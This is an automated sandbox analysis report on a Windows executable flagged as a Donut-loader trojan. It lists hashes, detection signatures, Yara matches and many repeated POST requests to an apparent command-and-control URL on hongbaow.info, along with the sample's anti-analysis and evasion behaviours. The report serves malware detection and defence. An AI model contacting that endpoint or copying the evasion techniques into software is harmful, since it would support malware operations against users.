Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jhdfer3s_jh3de.exe

Overview

General Information

Sample name:jhdfer3s_jh3de.exe
Analysis ID:1596616
MD5:446fee24759b2800c4ee7851930f07aa
SHA1:11378467db1872cb74b03738a7dc65abf1cc9459
SHA256:c12deb8079c75ef4b96f4af778fbb811a5c766f0560d57d63d6772fbe76b6b33
Tags:exejhdfer3s_jh3deuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jhdfer3s_jh3de.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\jhdfer3s_jh3de.exe" MD5: 446FEE24759B2800C4EE7851930F07AA)
    • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2936750327.0000000001220000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x33908:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x36e3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x76ee8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x7a41e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-22T08:35:01.170395+010028032742Potentially Bad Traffic192.168.2.44973134.160.111.145443TCP
2025-01-22T08:35:01.857533+010028032742Potentially Bad Traffic192.168.2.449732172.67.68.240443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: jhdfer3s_jh3de.exeVirustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: jhdfer3s_jh3de.exeJoe Sandbox ML: detected
Source: jhdfer3s_jh3de.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.68.240:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: jhdfer3s_jh3de.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: NTCreateprocess.pdb source: jhdfer3s_jh3de.exe
Source: Binary string: NTCreateprocess.pdbP$$$ source: jhdfer3s_jh3de.exe
Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: myexternalip.com
Source: unknownDNS query: name: api.iplocation.net
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 34.160.111.145:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 172.67.68.240:443
Source: global trafficHTTP traffic detected: GET /raw HTTP/1.1User-Agent: Mozilla/5.0Host: myexternalip.com
Source: global trafficHTTP traffic detected: GET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1User-Agent: Mozilla/5.0Host: api.iplocation.net
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 96Cache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A5C280 GetModuleHandleA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,GetModuleFileNameW,HttpOpenRequestA,HttpSendRequestA,HttpOpenRequestA,HttpSendRequestA,0_2_02A5C280
Source: global trafficHTTP traffic detected: GET /raw HTTP/1.1User-Agent: Mozilla/5.0Host: myexternalip.com
Source: global trafficHTTP traffic detected: GET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1User-Agent: Mozilla/5.0Host: api.iplocation.net
Source: global trafficDNS traffic detected: DNS query: myexternalip.com
Source: global trafficDNS traffic detected: DNS query: api.iplocation.net
Source: global trafficDNS traffic detected: DNS query: hongbaow.info
Source: unknownHTTP traffic detected: POST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Host: hongbaow.infoContent-Length: 313Cache-Control: no-cache
